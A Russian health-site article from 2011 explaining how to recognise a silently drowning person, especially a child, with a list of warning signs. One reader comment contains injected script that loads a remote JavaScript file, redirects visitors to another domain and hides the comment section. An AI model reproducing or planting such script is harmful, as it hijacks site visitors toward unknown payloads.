Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  «Помогите, я тону!»  >>  «Помогите, я тону!»
 
Обратная связь
 

«Помогите, я тону!»

Размер шрифта
29 августа 2011 07:55
  • google_analytics: false
  • Нравится

Трагедии на воде в этом году происходят постоянно. К сожалению, почти все из них – с участием детей. В субботу стало известно о том, что 9-летнего мальчика смыло из резиновой лодки волной. Ребенок погиб. Всем, кто еще только собирается в отпуск на море, тем более, с детьми, посвящается эта статья. 

Любой спасатель вам расскажет, что умению распознавать тех, кто вот-вот захлебнется, надо долго учиться. Погружение под воду происходит без всплесков, брызг, взмахов руками и отчаянных криков. И ребенок от момента своего захода в воду до трагичной секунды скорее всего не произнесет ни слова, ни звука. Только потом, придя в себя у же на берегу, горько расплакаться от страха.  

Помните, в 10% случаях ребенок гибнет на воде в то время, пока на него смотрит его родитель, не подозревая, что происходит.  

За редким исключением люди психологически не в состоянии позвать на помощь. Речь – это вторичная по отношению к дыханию функция. Сначала человек делает полноценный вдох и только потом он говорит. А если вдохнуть как следует он не может?

Рот тонущего практически всегда находится под водой. Человек не может ни вдохнуть, ни выдохнуть как следует. И речи нет о том, чтобы звать в таком состоянии на помощь. И если рот на секунду и появляется над поверхностью воды, то в эту секунду человек делает жизненно необходимые ему вдох и выдох, но никак не кричит.

Тонущие люди не могут размахивать руками. Инстинктивно человек вытянет руки в стороны и будет пытаться опереться на поверхность воды. Именно это движение дает ему возможность выровняться в воде, поднять голову и захватить воздух ртом.

Тонущий в принципе не в состоянии управлять своим телом по своему желанию. Все в этот момент происходит на инстинктивном уровне. Тонущий не может по собственному желанию прекратить тонуть и размахивать руками, зовя на помощь, плыть к спасателям или тянуться к брошенным ему с берега средствам спасения.

Тонущий человек  находится в воде прямо, и если трагедию вовремя не распознает спасатель, тонущий будет сопротивляться от силы минуту, а ребенок всего 20 секунд, прежде чем уйдет под воду окончательно.

Вот еще несколько признаков тонущего человека:

  1. Голова низко в воде, рот на уровне воды.

  2. Голова откинута назад, рот открыт.

  3. Глаза стеклянные, взгляд пустой, расфокусированный.

  4. Глаза закрыты.

  5. Волосы на лице.

  6. Ноги не двигаются, вертикальное положение тела.

  7. Попытки плыть, но неудачные.

  8. Попытки откинуться на спину.

  9. Движения такие, будто человек поднимается по лестнице, редко показывается из воды.

Тем не менее, если человек отчаянно машет руками, ему тоже нужна помощь. Но в отличие от тех, кто тонет, те, кто в панике, могут помочь спасателям спасти себя. И вот они-то как раз могут хватать спасательные круги и другие средства.

Итак, запомните, подчас самый верный признак того, что человек тонет, это когда совсем не похоже на то, что он идет ко дну. Иногда кажется, что человек просто плывет на спине и смотрит куда-то вверх. Достаточно просто спросить: «Ты там как?» И если ответа нет, значит, дело плохо. Если в ответ – стеклянный взгляд, то у вас 30 секунд, чтобы спасти жизнь.

Родители! Будьте внимательны. Ребенок всегда радуется в воде и громко сообщает о своей радости. Если же крики стихли, сразу выясните, по какой причине.

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.